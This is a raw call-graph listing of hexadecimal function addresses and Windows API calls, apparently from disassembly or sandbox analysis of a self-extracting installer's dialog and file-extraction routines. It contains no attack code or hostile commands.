7ff75aacb1ff 25650->25652 25653 7ff75aacb2db 25650->25653 25650->25699 25658 7ff75aacb207 25652->25658 25659 7ff75aacb2a9 25652->25659 25661 7ff75aacb391 25653->25661 25666 7ff75aacb2f5 25653->25666 25654 7ff75aad2320 _handle_error 8 API calls 25660 7ff75aacc350 25654->25660 25656 7ff75aacbec9 25663 7ff75aacbed5 SendDlgItemMessageW 25656->25663 25664 7ff75aacbef0 GetDlgItem SendMessageW 25656->25664 25657 7ff75aacbeba SendMessageW 25657->25656 25669 7ff75aabaae0 48 API calls 25658->25669 25658->25699 25665 7ff75aacb2cb EndDialog 25659->25665 25659->25699 25997 7ff75aaa22bc GetDlgItem 25661->25997 25663->25664 26278 7ff75aab62dc GetCurrentDirectoryW 25664->26278 25665->25699 25670 7ff75aabaae0 48 API calls 25666->25670 25673 7ff75aacb236 25669->25673 25674 7ff75aacb313 SetDlgItemTextW 25670->25674 25671 7ff75aacb3b1 EndDialog 25849 7ff75aacb3da 25671->25849 25672 7ff75aacbf47 GetDlgItem 26288 7ff75aaa2520 25672->26288 26292 7ff75aaa1ec4 34 API calls _handle_error 25673->26292 25678 7ff75aacb326 25674->25678 25677 7ff75aacb408 GetDlgItem 25682 7ff75aacb44f SetFocus 25677->25682 25683 7ff75aacb422 SendMessageW SendMessageW 25677->25683 25686 7ff75aacb340 GetMessageW 25678->25686 25678->25699 25681 7ff75aacb246 25685 7ff75aacb25c 25681->25685 25692 7ff75aaa250c SetDlgItemTextW 25681->25692 25687 7ff75aacb465 25682->25687 25688 7ff75aacb4f2 25682->25688 25683->25682 25685->25699 25705 7ff75aacc363 25685->25705 25694 7ff75aacb35e IsDialogMessageW 25686->25694 25686->25699 25695 7ff75aabaae0 48 API calls 25687->25695 26011 7ff75aaa8d04 25688->26011 25689 7ff75aacbcc5 25696 7ff75aabaae0 48 API calls 25689->25696 25690 7ff75aaa1fa0 31 API calls 25690->25699 25692->25685 25694->25678 25700 7ff75aacb373 TranslateMessage DispatchMessageW 25694->25700 25701 7ff75aacb46f 25695->25701 25702 7ff75aacbcd6 SetDlgItemTextW 25696->25702 25698 7ff75aacb52c 26021 7ff75aacef80 25698->26021 25699->25654 25700->25678 26293 7ff75aaa129c 25701->26293 25706 7ff75aabaae0 48 API calls 25702->25706 25707 7ff75aad7904 _invalid_parameter_noinfo_noreturn 31 API calls 25705->25707 25718 7ff75aacbd08 25706->25718 25711 7ff75aacc368 25707->25711 25709 7ff75aabaae0 48 API calls 25716 7ff75aacb555 25709->25716 25723 7ff75aad7904 _invalid_parameter_noinfo_noreturn 31 API calls 25711->25723 25720 7ff75aabda98 48 API calls 25716->25720 25717 7ff75aacb498 25721 7ff75aacf0a4 24 API calls 25717->25721 25728 7ff75aaa129c 33 API calls 25718->25728 25726 7ff75aacb568 25720->25726 25727 7ff75aacb4a5 25721->25727 25730 7ff75aacc36e 25723->25730 26035 7ff75aacf0a4 25726->26035 25727->25711 25748 7ff75aacb4e8 25727->25748 25757 7ff75aacbd31 25728->25757 25740 7ff75aad7904 _invalid_parameter_noinfo_noreturn 31 API calls 25730->25740 25738 7ff75aacbdda 25749 7ff75aabaae0 48 API calls 25738->25749 25750 7ff75aacc374 25740->25750 25744 7ff75aaa1fa0 31 API calls 25755 7ff75aacb586 25744->25755 25747 7ff75aacb5ec 25760 7ff75aacb61a 25747->25760 26304 7ff75aab32a8 25747->26304 25748->25747 26303 7ff75aacfa80 33 API calls 2 library calls 25748->26303 25762 7ff75aacbde4 25749->25762 25766 7ff75aad7904 _invalid_parameter_noinfo_noreturn 31 API calls 25750->25766 25755->25730 25755->25748 25757->25738 25767 7ff75aaa129c 33 API calls 25757->25767 26049 7ff75aab2f58 25760->26049 25778 7ff75aaa129c 33 API calls 25762->25778 25772 7ff75aacc37a 25766->25772 25773 7ff75aacbd7f 25767->25773 25780 7ff75aad7904 _invalid_parameter_noinfo_noreturn 31 API calls 25772->25780 25782 7ff75aabaae0 48 API calls 25773->25782 25776 7ff75aacb634 GetLastError 25777 7ff75aacb64c 25776->25777 26061 7ff75aab7fc4 25777->26061 25779 7ff75aacbe0d 25778->25779 25794 7ff75aaa129c 33 API calls 25779->25794 25785 7ff75aacc380 25780->25785 25786 7ff75aacbd8a 25782->25786 25784 7ff75aacb60e 26307 7ff75aac9d90 12 API calls _handle_error 25784->26307 25795 7ff75aad7904 _invalid_parameter_noinfo_noreturn 31 API calls 25785->25795 25791 7ff75aaa1150 33 API calls 25786->25791 25796 7ff75aacbda2 25791->25796 25793 7ff75aacb65e 25798 7ff75aacb674 25793->25798 25799 7ff75aacb665 GetLastError 25793->25799 25801 7ff75aacbe4e 25794->25801 25802 7ff75aacc386 25795->25802 26337 7ff75aaa2034 25796->26337 25800 7ff75aacb71c 25798->25800 25804 7ff75aacb72b 25798->25804 25805 7ff75aacb68b GetTickCount 25798->25805 25799->25798 25800->25804 25820 7ff75aacbb79 25800->25820 25813 7ff75aaa1fa0 31 API calls 25801->25813 25806 7ff75aaa255c 61 API calls 25802->25806 25810 7ff75aacba50 25804->25810 26308 7ff75aab6454 25804->26308 26064 7ff75aaa4228 25805->26064 25809 7ff75aacc3e4 25806->25809 25814 7ff75aacc3e8 25809->25814 25823 7ff75aacc489 GetDlgItem SetFocus 25809->25823 25851 7ff75aacc3fd 25809->25851 25810->25671 26332 7ff75aaabd0c 33 API calls 25810->26332 25811 7ff75aacbdbe 25818 7ff75aaa1fa0 31 API calls 25811->25818 25821 7ff75aacbe78 25813->25821 25830 7ff75aad2320 _handle_error 8 API calls 25814->25830 25826 7ff75aacbdcc 25818->25826 25836 7ff75aabaae0 48 API calls 25820->25836 25828 7ff75aaa1fa0 31 API calls 25821->25828 25822 7ff75aacba75 26333 7ff75aaa1150 25822->26333 25834 7ff75aacc4ba 25823->25834 25825 7ff75aacb74e 26320 7ff75aabb914 102 API calls 25825->26320 25833 7ff75aaa1fa0 31 API calls 25826->25833 25827 7ff75aacb6ba 25835 7ff75aaa1fa0 31 API calls 25827->25835 25837 7ff75aacbe83 25828->25837 25839 7ff75aacca97 25830->25839 25833->25738 25847 7ff75aaa129c 33 API calls 25834->25847 25841 7ff75aacb6c8 25835->25841 25842 7ff75aacbba7 SetDlgItemTextW 25836->25842 25843 7ff75aaa1fa0 31 API calls 25837->25843 25838 7ff75aacba8a 25844 7ff75aabaae0 48 API calls 25838->25844 25840 7ff75aacb768 25846 7ff75aabda98 48 API calls 25840->25846 26074 7ff75aab2134 25841->26074 25848 7ff75aaa2534 25842->25848 25843->25849 25850 7ff75aacba97 25844->25850 25845 7ff75aacc434 SendDlgItemMessageW 25852 7ff75aacc454 25845->25852 25853 7ff75aacc45d EndDialog 25845->25853 25854 7ff75aacb7aa GetCommandLineW 25846->25854 25855 7ff75aacc4cc 25847->25855 25856 7ff75aacbbc5 SetDlgItemTextW GetDlgItem 25848->25856 25849->25690 25857 7ff75aaa1150 33 API calls 25850->25857 25851->25814 25851->25845 25852->25853 25853->25814 25858 7ff75aacb84f 25854->25858 25859 7ff75aacb869 25854->25859 26341 7ff75aab80d8 33 API calls 25855->26341 25864 7ff75aacbc13 25856->25864 25865 7ff75aacbbf0 GetWindowLongPtrW SetWindowLongPtrW 25856->25865 25866 7ff75aacbaaa 25857->25866 26321 7ff75aaa20b0 25858->26321 26325 7ff75aacab54 33 API calls _handle_error 25859->26325 25861 7ff75aacc4e0 25867 7ff75aaa250c SetDlgItemTextW 25861->25867 26094 7ff75aacce88 25864->26094 25865->25864 25871 7ff75aaa1fa0 31 API calls 25866->25871 25872 7ff75aacc4f4 25867->25872 25868 7ff75aacb87a 26326 7ff75aacab54 33 API calls _handle_error 25868->26326 25877 7ff75aacbab5 25871->25877 25883 7ff75aacc526 SendDlgItemMessageW FindFirstFileW 25872->25883 25874 7ff75aacb704 26090 7ff75aab204c 25874->26090 25875 7ff75aacb6f5 GetLastError 25875->25874 25882 7ff75aaa1fa0 31 API calls 25877->25882 25879 7ff75aacb88b 26327 7ff75aacab54 33 API calls _handle_error 25879->26327 25881 7ff75aacce88 160 API calls 25886 7ff75aacbc3c 25881->25886 25887 7ff75aacbac3 25882->25887 25888 7ff75aacc57b 25883->25888 25981 7ff75aacca04 25883->25981 26244 7ff75aacf974 25886->26244 25897 7ff75aabaae0 48 API calls 25887->25897 25898 7ff75aabaae0 48 API calls 25888->25898 25889 7ff75aacb89c 26328 7ff75aabb9b4 102 API calls 25889->26328 25894 7ff75aacb8b3 26329 7ff75aacfbdc 33 API calls 25894->26329 25895 7ff75aacca81 25895->25814 25896 7ff75aacce88 160 API calls 25911 7ff75aacbc6a 25896->25911 25901 7ff75aacbadb 25897->25901 25902 7ff75aacc59e 25898->25902 25900 7ff75aaccaa9 25904 7ff75aad7904 _invalid_parameter_noinfo_noreturn 31 API calls 25900->25904 25912 7ff75aaa129c 33 API calls 25901->25912 25914 7ff75aaa129c 33 API calls 25902->25914 25903 7ff75aacb8d2 CreateFileMappingW 25906 7ff75aacb953 ShellExecuteExW 25903->25906 25907 7ff75aacb911 MapViewOfFile 25903->25907 25908 7ff75aaccaae 25904->25908 25905 7ff75aacbc96 26258 7ff75aaa2298 GetDlgItem EnableWindow 25905->26258 25929 7ff75aacb974 25906->25929 26330 7ff75aad3640 25907->26330 25915 7ff75aad7904 _invalid_parameter_noinfo_noreturn 31 API calls 25908->25915 25911->25905 25916 7ff75aacce88 160 API calls 25911->25916 25924 7ff75aacbb04 25912->25924 25913 7ff75aacb3f5 25913->25671 25913->25689 25917 7ff75aacc5cd 25914->25917 25918 7ff75aaccab4 25915->25918 25916->25905 25919 7ff75aaa1150 33 API calls 25917->25919 25922 7ff75aad7904 _invalid_parameter_noinfo_noreturn 31 API calls 25918->25922 25920 7ff75aacc5e8 25919->25920 26342 7ff75aaae164 33 API calls 2 library calls 25920->26342 25921 7ff75aacb9c3 25930 7ff75aacb9ef 25921->25930 25931 7ff75aacb9dc UnmapViewOfFile CloseHandle 25921->25931 25927 7ff75aaccaba 25922->25927 25923 7ff75aacbb5a 25925 7ff75aaa1fa0 31 API calls 25923->25925 25924->25772 25924->25923 25925->25671 25934 7ff75aad7904 _invalid_parameter_noinfo_noreturn 31 API calls 25927->25934 25928 7ff75aacc5ff 25932 7ff75aaa1fa0 31 API calls 25928->25932 25929->25921 25937 7ff75aacb9b1 Sleep 25929->25937 25930->25750 25933 7ff75aacba25 25930->25933 25931->25930 25936 7ff75aacc60c 25932->25936 25935 7ff75aaa1fa0 31 API calls 25933->25935 25938 7ff75aaccac0 25934->25938 25939 7ff75aacba42 25935->25939 25936->25908 25941 7ff75aaa1fa0 31 API calls 25936->25941 25937->25921 25937->25929 25942 7ff75aad7904 _invalid_parameter_noinfo_noreturn 31 API calls 25938->25942 25940 7ff75aaa1fa0 31 API calls 25939->25940 25940->25810 25944 7ff75aacc673 25941->25944 25943 7ff75aaccac6 25942->25943 25946 7ff75aad7904 _invalid_parameter_noinfo_noreturn 31 API calls 25943->25946 25945 7ff75aaa250c SetDlgItemTextW 25944->25945 25947 7ff75aacc687 FindClose 25945->25947 25948 7ff75aaccacc 25946->25948 25949 7ff75aacc6a3 25947->25949 25950 7ff75aacc797 SendDlgItemMessageW 25947->25950 26343 7ff75aaca2cc 10 API calls _handle_error 25949->26343 25951 7ff75aacc7cb 25950->25951 25955 7ff75aabaae0 48 API calls 25951->25955 25953 7ff75aacc6c6 25954 7ff75aabaae0 48 API calls 25953->25954 25956 7ff75aacc6cf 25954->25956 25957 7ff75aacc7d8 25955->25957 25958 7ff75aabda98 48 API calls 25956->25958 25959 7ff75aaa129c 33 API calls 25957->25959 25962 7ff75aacc6ec memcpy_s 25958->25962 25961 7ff75aacc807 25959->25961 25960 7ff75aaa1fa0 31 API calls 25963 7ff75aacc783 25960->25963 25964 7ff75aaa1150 33 API calls 25961->25964 25962->25918 25962->25960 25965 7ff75aaa250c SetDlgItemTextW 25963->25965 25966 7ff75aacc822 25964->25966 25965->25950 26344 7ff75aaae164 33 API calls 2 library calls 25966->26344 25968 7ff75aacc839 25969 7ff75aaa1fa0 31 API calls 25968->25969 25970 7ff75aacc845 memcpy_s 25969->25970 25971 7ff75aaa1fa0 31 API calls 25970->25971 25972 7ff75aacc87f 25971->25972 25973 7ff75aaa1fa0 31 API calls 25972->25973 25974 7ff75aacc88c 25973->25974 25974->25927 25975 7ff75aaa1fa0 31 API calls 25974->25975 25976 7ff75aacc8f3 25975->25976 25977 7ff75aaa250c SetDlgItemTextW 25976->25977 25978 7ff75aacc907 25977->25978 25978->25981 26345 7ff75aaca2cc 10 API calls _handle_error 25978->26345 25980 7ff75aacc932 25982 7ff75aabaae0 48 API calls 25980->25982 25981->25814 25981->25895 25981->25900 25981->25943 25983 7ff75aacc93c 25982->25983 25984 7ff75aabda98 48 API calls 25983->25984 25987 7ff75aacc959 memcpy_s 25984->25987 25985 7ff75aaa1fa0 31 API calls 25986 7ff75aacc9f0 25985->25986 25988 7ff75aaa250c SetDlgItemTextW 25986->25988 25987->25938 25987->25985 25988->25981 25990 7ff75aaa25d0 25989->25990 25991 7ff75aaa256a 25989->25991 25990->25648 25991->25990 26346 7ff75aaba4ac 25991->26346 25993 7ff75aaa258f 25993->25990 25994 7ff75aaa25a4 GetDlgItem 25993->25994 25994->25990 25995 7ff75aaa25b7 25994->25995 25995->25990 25996 7ff75aaa25be SetWindowTextW 25995->25996 25996->25990 25998 7ff75aaa2334 25997->25998 25999 7ff75aaa22fc 25997->25999 26399 7ff75aaa23f8 GetWindowTextLengthW 25998->26399 26001 7ff75aaa129c 33 API calls 25999->26001 26002 7ff75aaa232a memcpy_s 26001->26002 26003 7ff75aaa1fa0 31 API calls 26002->26003 26005 7ff75aaa2389 26002->26005 26003->26005 26004 7ff75aad2320 _handle_error 8 API calls 26007 7ff75aaa23dd 26004->26007 26006 7ff75aaa23c8 26005->26006 26008 7ff75aaa23f0 26005->26008 26006->26004 26007->25671 26007->25677 26007->25913 26009 7ff75aad7904 _invalid_parameter_noinfo_noreturn 31 API calls 26008->26009 26010 7ff75aaa23f5 26009->26010 26012 7ff75aaa8d34 26011->26012 26013 7ff75aaa8de8 26011->26013 26016 7ff75aaa8d42 memcpy_s 26012->26016 26017 7ff75aaa8d91 26012->26017 26018 7ff75aaa8de3 26012->26018 26424 7ff75aaa2004 33 API calls std::_Xinvalid_argument 26013->26424 26016->25698 26017->26016 26020 7ff75aad21d0 33 API calls 26017->26020 26423 7ff75aaa1f80 33 API calls 3 library calls 26018->26423 26020->26016 26025 7ff75aacefb0 26021->26025 26022 7ff75aacefd7 26023 7ff75aad2320 _handle_error 8 API calls 26022->26023 26024 7ff75aacb537 26023->26024 26024->25709 26025->26022 26425 7ff75aaabd0c 33 API calls 26025->26425 26027 7ff75aacf02a 26028 7ff75aaa1150 33 API calls 26027->26028 26029 7ff75aacf03f 26028->26029 26031 7ff75aaa1fa0 31 API calls 26029->26031 26032 7ff75aacf04f memcpy_s 26029->26032 26030 7ff75aaa1fa0 31 API calls 26033 7ff75aacf076 26030->26033 26031->26032 26032->26030 26034 7ff75aaa1fa0 31 API calls 26033->26034 26034->26022 26426 7ff75aacae1c PeekMessageW 26035->26426 26038 7ff75aacf143 SendMessageW SendMessageW 26040 7ff75aacf1a4 SendMessageW 26038->26040 26041 7ff75aacf189 26038->26041 26039 7ff75aacf0f5 26042 7ff75aacf101 ShowWindow SendMessageW SendMessageW 26039->26042 26043 7ff75aacf1c3 26040->26043 26044 7ff75aacf1c6 SendMessageW SendMessageW 26040->26044 26041->26040 26042->26038 26043->26044 26045 7ff75aacf1f3 SendMessageW 26044->26045 26046 7ff75aacf218 SendMessageW 26044->26046 26045->26046 26047 7ff75aad2320 _handle_error 8 API calls 26046->26047 26048 7ff75aacb578 26047->26048 26048->25744 26050 7ff75aab309d 26049->26050 26057 7ff75aab2f8e 26049->26057 26051 7ff75aad2320 _handle_error 8 API calls 26050->26051 26052 7ff75aab30b3 26051->26052 26052->25776 26052->25777 26053 7ff75aab3077 26053->26050 26054 7ff75aab3684 56 API calls 26053->26054 26054->26050 26055 7ff75aaa129c 33 API calls 26055->26057 26057->26053 26057->26055 26058 7ff75aab30c8 26057->26058 26431 7ff75aab3684 26057->26431 26059 7ff75aad7904 _invalid_parameter_noinfo_noreturn 31 API calls 26058->26059 26060 7ff75aab30cd 26059->26060 26062 7ff75aab7fd2 SetCurrentDirectoryW 26061->26062 26063 7ff75aab7fcf 26061->26063 26062->25793 26063->26062 26065 7ff75aaa4255 26064->26065 26066 7ff75aaa426a 26065->26066 26067 7ff75aaa129c 33 API calls 26065->26067 26068 7ff75aad2320 _handle_error 8 API calls 26066->26068 26067->26066 26069 7ff75aaa42a1 26068->26069 26070 7ff75aaa3c84 26069->26070 26071 7ff75aaa3cab 26070->26071 26579 7ff75aaa710c 26071->26579 26073 7ff75aaa3cbb memcpy_s 26073->25827 26077 7ff75aab216a 26074->26077 26075 7ff75aab219e 26078 7ff75aab227f 26075->26078 26079 7ff75aab6a0c 49 API calls 26075->26079 26076 7ff75aab21b1 CreateFileW 26076->26075 26077->26075 26077->26076 26080 7ff75aab22af 26078->26080 26086 7ff75aaa20b0 33 API calls 26078->26086 26081 7ff75aab2209 26079->26081 26082 7ff75aad2320 _handle_error 8 API calls 26080->26082 26084 7ff75aab2246 26081->26084 26085 7ff75aab220d CreateFileW 26081->26085 26083 7ff75aab22c4 26082->26083 26083->25874 26083->25875 26084->26078 26087 7ff75aab22d8 26084->26087 26085->26084 26086->26080 26088 7ff75aad7904 _invalid_parameter_noinfo_noreturn 31 API calls 26087->26088 26089 7ff75aab22dd 26088->26089 26091 7ff75aab2072 26090->26091 26092 7ff75aab2066 26090->26092 26092->26091 26591 7ff75aab20d0 26092->26591 26598 7ff75aacaa08 26094->26598 26096 7ff75aacd1ee 26097 7ff75aaa1fa0 31 API calls 26096->26097 26098 7ff75aacd1f7 26097->26098 26099 7ff75aad2320 _handle_error 8 API calls 26098->26099 26101 7ff75aacbc2b 26099->26101 26100 7ff75aabd22c 33 API calls 26195 7ff75aaccf03 memcpy_s 26100->26195 26101->25881 26102 7ff75aaceefa 26730 7ff75aaa704c 47 API calls memcpy_s 26102->26730 26105 7ff75aaa129c 33 API calls 26105->26195 26106 7ff75aacef00 26731 7ff75aaa704c 47 API calls memcpy_s 26106->26731 26109 7ff75aaceeee 26111 7ff75aad7904 _invalid_parameter_noinfo_noreturn 31 API calls 26109->26111 26110 7ff75aacef06 26112 7ff75aad7904 _invalid_parameter_noinfo_noreturn 31 API calls 26110->26112 26113 7ff75aaceef4 26111->26113 26114 7ff75aacef0c 26112->26114 26729 7ff75aaa704c 47 API calls memcpy_s 26113->26729 26117 7ff75aad7904 _invalid_parameter_noinfo_noreturn 31 API calls 26114->26117 26119 7ff75aacef12 26117->26119 26118 7ff75aacee4a 26120 7ff75aaceed2 26118->26120 26121 7ff75aaa20b0 33 API calls 26118->26121 26124 7ff75aad7904 _invalid_parameter_noinfo_noreturn 31 API calls 26119->26124 26727 7ff75aaa1f80 33 API calls 3 library calls 26120->26727 26125 7ff75aacee77 26121->26125 26122 7ff75aaceee8 26728 7ff75aaa2004 33 API calls std::_Xinvalid_argument 26122->26728 26123 7ff75aaa13a4 33 API calls 26126 7ff75aacdc3a GetTempPathW 26123->26126 26127 7ff75aacef18 26124->26127 26726 7ff75aacabe8 33 API calls 3 library calls 26125->26726 26126->26195 26134 7ff75aad7904 _invalid_parameter_noinfo_noreturn 31 API calls 26127->26134 26128 7ff75aab62dc 35 API calls 26128->26195 26132 7ff75aacee8d 26141 7ff75aaa1fa0 31 API calls 26132->26141 26145 7ff75aaceea4 memcpy_s 26132->26145 26133 7ff75aaa2520 SetWindowTextW 26133->26195 26138 7ff75aacef1e 26134->26138 26137 7ff75aadbb8c 43 API calls 26137->26195 26146 7ff75aad7904 _invalid_parameter_noinfo_noreturn 31 API calls 26138->26146 26140 7ff75aace7f3 26140->26120 26140->26122 26144 7ff75aad21d0 33 API calls 26140->26144 26154 7ff75aace83b memcpy_s 26140->26154 26141->26145 26142 7ff75aaa1fa0 31 API calls 26142->26120 26143 7ff75aaa2034 33 API calls 26143->26195 26144->26154 26145->26142 26148 7ff75aacef24 26146->26148 26147 7ff75aacaa08 33 API calls 26147->26195 26152 7ff75aad7904 _invalid_parameter_noinfo_noreturn 31 API calls 26148->26152 26150 7ff75aacef6c 26734 7ff75aaa2004 33 API calls std::_Xinvalid_argument 26150->26734 26151 7ff75aacef78 26736 7ff75aaa2004 33 API calls std::_Xinvalid_argument 26151->26736 26157 7ff75aacef2a 26152->26157 26153 7ff75aab3f30 54 API calls 26153->26195 26162 7ff75aaa20b0 33 API calls 26154->26162 26202 7ff75aaceb8f 26154->26202 26156 7ff75aaa1fa0 31 API calls 26156->26118 26168 7ff75aad7904 _invalid_parameter_noinfo_noreturn 31 API calls 26157->26168 26158 7ff75aacef72 26735 7ff75aaa1f80 33 API calls 3 library calls 26158->26735 26159 7ff75aaa20b0 33 API calls 26159->26195 26161 7ff75aacef66 26733 7ff75aaa1f80 33 API calls 3 library calls 26161->26733 26169 7ff75aace963 26162->26169 26165 7ff75aaced40 26165->26151 26165->26158 26181 7ff75aaced3b memcpy_s 26165->26181 26186 7ff75aad21d0 33 API calls 26165->26186 26167 7ff75aacec2a 26167->26150 26167->26161 26175 7ff75aacec72 memcpy_s 26167->26175 26167->26181 26183 7ff75aad21d0 33 API calls 26167->26183 26173 7ff75aacef30 26168->26173 26182 7ff75aaa129c 33 API calls 26169->26182 26211 7ff75aacef60 26169->26211 26172 7ff75aac99c8 31 API calls 26172->26195 26187 7ff75aad7904 _invalid_parameter_noinfo_noreturn 31 API calls 26173->26187 26174 7ff75aab3d34 51 API calls 26174->26195 26641 7ff75aacf4e0 26175->26641 26177 7ff75aacd5e9 GetDlgItem 26184 7ff75aaa2520 SetWindowTextW 26177->26184 26178 7ff75aabdc2c 33 API calls 26178->26195 26181->26156 26188 7ff75aace9a6 26182->26188 26183->26175 26189 7ff75aacd608 SendMessageW 26184->26189 26186->26181 26191 7ff75aacef36 26187->26191 26722 7ff75aabd22c 26188->26722 26189->26195 26190 7ff75aab32bc 51 API calls 26190->26195 26196 7ff75aad7904 _invalid_parameter_noinfo_noreturn 31 API calls 26191->26196 26194 7ff75aab5b60 53 API calls 26194->26195 26195->26096 26195->26100 26195->26102 26195->26105 26195->26106 26195->26109 26195->26110 26195->26113 26195->26114 26195->26118 26195->26119 26195->26123 26195->26127 26195->26128 26195->26133 26195->26137 26195->26138 26195->26140 26195->26143 26195->26147 26195->26148 26195->26153 26195->26157 26195->26159 26195->26172 26195->26173 26195->26174 26195->26178 26195->26190 26195->26191 26195->26194 26197 7ff75aacd63c SendMessageW 26195->26197 26201 7ff75aacef3c 26195->26201 26206 7ff75aacef42 26195->26206 26207 7ff75aaa1744 33 API calls 26195->26207 26210 7ff75aaa4228 33 API calls 26195->26210 26214 7ff75aab5820 33 API calls 26195->26214 26215 7ff75aab32a8 51 API calls 26195->26215 26217 7ff75aab5aa8 33 API calls 26195->26217 26218 7ff75aaa8d04 33 API calls 26195->26218 26219 7ff75aaae164 33 API calls 26195->26219 26220 7ff75aaa250c SetDlgItemTextW 26195->26220 26224 7ff75aaa1150 33 API calls 26195->26224 26230 7ff75aaa2674 31 API calls 26195->26230 26235 7ff75aacdf99 EndDialog 26195->26235 26237 7ff75aacdb21 MoveFileW 26195->26237 26241 7ff75aab2f58 56 API calls 26195->26241 26243 7ff75aaa1fa0 31 API calls 26195->26243 26602 7ff75aac13c4 CompareStringW 26195->26602 26603 7ff75aaca440 26195->26603 26679 7ff75aabcfa4 35 API calls _invalid_parameter_noinfo_noreturn 26195->26679 26680 7ff75aac95b4 33 API calls Concurrency::cancel_current_task 26195->26680 26681 7ff75aad0684 31 API calls _invalid_parameter_noinfo_noreturn 26195->26681 26682 7ff75aaadf4c 47 API calls memcpy_s 26195->26682 26683 7ff75aaca834 33 API calls _invalid_parameter_noinfo_noreturn 26195->26683 26684 7ff75aac9518 33 API calls 26195->26684 26685 7ff75aacabe8 33 API calls 3 library calls 26195->26685 26686 7ff75aab7368 33 API calls 2 library calls 26195->26686 26687 7ff75aab4088 33 API calls 26195->26687 26688 7ff75aab65b0 33 API calls 3 library calls 26195->26688 26689 7ff75aab72cc 26195->26689 26693 7ff75aab31bc 26195->26693 26707 7ff75aab3ea0 FindClose 26195->26707 26708 7ff75aac13f4 CompareStringW 26195->26708 26709 7ff75aac9cd0 47 API calls 26195->26709 26710 7ff75aac87d8 51 API calls 3 library calls 26195->26710 26711 7ff75aacab54 33 API calls _handle_error 26195->26711 26712 7ff75aab7df4 26195->26712 26720 7ff75aab5b08 CompareStringW 26195->26720 26721 7ff75aab7eb0 47 API calls 26195->26721 26196->26201 26197->26195 26203 7ff75aad7904 _invalid_parameter_noinfo_noreturn 31 API calls 26201->26203 26202->26165 26202->26167 26208 7ff75aacef5a 26202->26208 26227 7ff75aacef54 26202->26227 26203->26206 26205 7ff75aad7904 _invalid_parameter_noinfo_noreturn 31 API calls 26205->26208 26212 7ff75aad7904 _invalid_parameter_noinfo_noreturn 31 API calls 26206->26212 26207->26195 26209 7ff75aad7904 _invalid_parameter_noinfo_noreturn 31 API calls 26208->26209 26209->26211 26210->26195 26732 7ff75aaa704c 47 API calls memcpy_s 26211->26732 26213 7ff75aacef48 26212->26213 26216 7ff75aad7904 _invalid_parameter_noinfo_noreturn 31 API calls 26213->26216 26214->26195 26215->26195 26221 7ff75aacef4e 26216->26221 26217->26195 26218->26195 26219->26195 26220->26195 26225 7ff75aad7904 _invalid_parameter_noinfo_noreturn 31 API calls 26221->26225 26224->26195 26225->26227 26227->26205 26228 7ff75aaa1fa0 31 API calls 26234 7ff75aace9d1 26228->26234 26229 7ff75aaa129c 33 API calls 26229->26234 26230->26195 26232 7ff75aac13c4 CompareStringW 26232->26234 26234->26202 26234->26213 26234->26221 26234->26228 26234->26229 26234->26232 26236 7ff75aabd22c 33 API calls 26234->26236 26235->26195 26236->26234 26238 7ff75aacdb55 MoveFileExW 26237->26238 26239 7ff75aacdb70 26237->26239 26238->26239 26239->26195 26240 7ff75aaa1fa0 31 API calls 26239->26240 26240->26239 26241->26195 26243->26195 26245 7ff75aacf9a3 26244->26245 26246 7ff75aaa20b0 33 API calls 26245->26246 26247 7ff75aacf9b9 26246->26247 26248 7ff75aacf9ee 26247->26248 26249 7ff75aaa20b0 33 API calls 26247->26249 26749 7ff75aaae34c 26248->26749 26249->26248 26251 7ff75aacfa4b 26769 7ff75aaae7a8 26251->26769 26255 7ff75aacfa61 26256 7ff75aad2320 _handle_error 8 API calls 26255->26256 26257 7ff75aacbc52 26256->26257 26257->25896 27899 7ff75aac849c 26259->27899 26262 7ff75aacf4b7 26265 7ff75aad2320 _handle_error 8 API calls 26262->26265 26263 7ff75aacf3c7 GetWindow 26264 7ff75aacf3e2 26263->26264 26264->26262 26267 7ff75aacf3ee GetClassNameW 26264->26267 26269 7ff75aacf496 GetWindow 26264->26269 26270 7ff75aacf417 GetWindowLongPtrW 26264->26270 26266 7ff75aacbe9b 26265->26266 26266->25656 26266->25657 27904 7ff75aac13c4 CompareStringW 26267->27904 26269->26262 26269->26264 26270->26269 26271 7ff75aacf429 SendMessageW 26270->26271 26271->26269 26272 7ff75aacf445 GetObjectW 26271->26272 27905 7ff75aac8504 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 26272->27905 26274 7ff75aacf461 27906 7ff75aac84cc 26274->27906 27910 7ff75aac8df4 16 API calls _handle_error 26274->27910 26277 7ff75aacf479 SendMessageW DeleteObject 26277->26269 26279 7ff75aab6300 26278->26279 26285 7ff75aab638d 26278->26285 26280 7ff75aaa13a4 33 API calls 26279->26280 26281 7ff75aab631b GetCurrentDirectoryW 26280->26281 26282 7ff75aab6341 26281->26282 26283 7ff75aaa20b0 33 API calls 26282->26283 26284 7ff75aab634f 26283->26284 26284->26285 26286 7ff75aad7904 _invalid_parameter_noinfo_noreturn 31 API calls 26284->26286 26285->25672 26287 7ff75aab63a9 26286->26287 26289 7ff75aaa2527 26288->26289 26290 7ff75aaa252a SetWindowTextW 26288->26290 26289->26290 26291 7ff75ab0e2e0 26290->26291 26292->25681 26294 7ff75aaa12d0 26293->26294 26301 7ff75aaa139b 26293->26301 26295 7ff75aaa12de memcpy_s 26294->26295 26298 7ff75aaa1396 26294->26298 26300 7ff75aaa1338 26294->26300 26295->25717 27913 7ff75aaa1f80 33 API calls 3 library calls 26298->27913 26300->26295 26302 7ff75aad21d0 33 API calls 26300->26302 27914 7ff75aaa2004 33 API calls std::_Xinvalid_argument 26301->27914 26302->26295 26303->25747 26305 7ff75aab32bc 51 API calls 26304->26305 26306 7ff75aab32b1 26305->26306 26306->25760 26306->25784 26307->25760 26309 7ff75aaa13a4 33 API calls 26308->26309 26310 7ff75aab6489 26309->26310 26311 7ff75aab648c GetModuleFileNameW 26310->26311 26314 7ff75aab64dc 26310->26314 26312 7ff75aab64a7 26311->26312 26313 7ff75aab64de 26311->26313 26312->26310 26313->26314 26315 7ff75aaa129c 33 API calls 26314->26315 26317 7ff75aab6506 26315->26317 26316 7ff75aab653e 26316->25825 26317->26316 26318 7ff75aad7904 _invalid_parameter_noinfo_noreturn 31 API calls 26317->26318 26319 7ff75aab6560 26318->26319 26320->25840 26322 7ff75aaa20f6 26321->26322 26324 7ff75aaa20cb memcpy_s 26321->26324 27915 7ff75aaa1474 33 API calls 3 library calls 26322->27915 26324->25859 26325->25868 26326->25879 26327->25889 26328->25894 26329->25903 26331 7ff75aad3620 26330->26331 26331->25906 26332->25822 26334 7ff75aaa1177 26333->26334 26335 7ff75aaa2034 33 API calls 26334->26335 26336 7ff75aaa1185 memcpy_s 